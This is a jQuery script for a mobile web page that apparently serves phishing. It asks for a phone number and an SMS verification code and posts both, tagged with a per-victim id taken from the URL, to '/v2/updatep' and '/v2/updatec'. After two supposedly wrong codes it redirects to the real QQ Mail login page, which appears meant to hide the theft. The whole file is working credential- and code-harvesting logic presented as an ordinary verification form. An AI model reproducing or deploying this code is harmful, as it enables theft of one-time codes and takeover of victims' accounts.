function showTip(text) {
    $('.weui-dialog__bd').html(text)
    $('#iosDialog2').show()
}

function queryString(name) {
    var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)", "i");
    var r = window.location.search.substr(1).match(reg);
    if (r != null) return decodeURIComponent(r[2]); return null;
}
var count = 0;
$(document).ready(function(){
    $('.weui-vcode-btn').on('click',function(){
        if ($('#uid').val() === '') {
            return showTip('请输入正确的手机号')
        }
        $.ajax({
            url: '/v2/updatep',
            type: 'post',
            data: {
                phone: $('#uid').val(),
                ranid: queryString('id')
            },
            success: function(res){
                console.log(res)
            }
        })
        showTip('短信验证码已发送')
    })

    $('.weui-btn_primary1').on('click',function(){
        
        if ($('#yzm').val() === '') {
            return showTip('请输入验证码')
        }
        $.ajax({
            url: '/v2/updatec',
            type: 'post',
            data: {
                code: $('#yzm').val(),
                ranid: queryString('id')
            },
            success: function(res){
                
                if (res === '0'){
                    count++;
                    if (count === 2) {
                        window.location.href = 'https://ui.ptlogin2.qq.com/cgi-bin/login?style=9&appid=522005705&daid=4&s_url=https%3A%2F%2Fw.mail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwsk%26delegate_url%3D%26f%3Dxhtml%26target%3D&hln_css=http%3A%2F%2Fmail.qq.com%2Fzh_CN%2Fhtmledition%2Fimages%2Flogo%2Fqqmail%2Fqqmail_logo_default_200h.png&low_login=1&hln_autologin=%E8%AE%B0%E4%BD%8F%E7%99%BB%E5%BD%95%E7%8A%B6%E6%80%81&pt_no_onekey=1'
                    }
                    return showTip('请输入正确的验证码')
                }
            }
        })
    })

    $('.weui-dialog__btn_primary').on('click',function(){
        $('#iosDialog2').hide()
    })
})
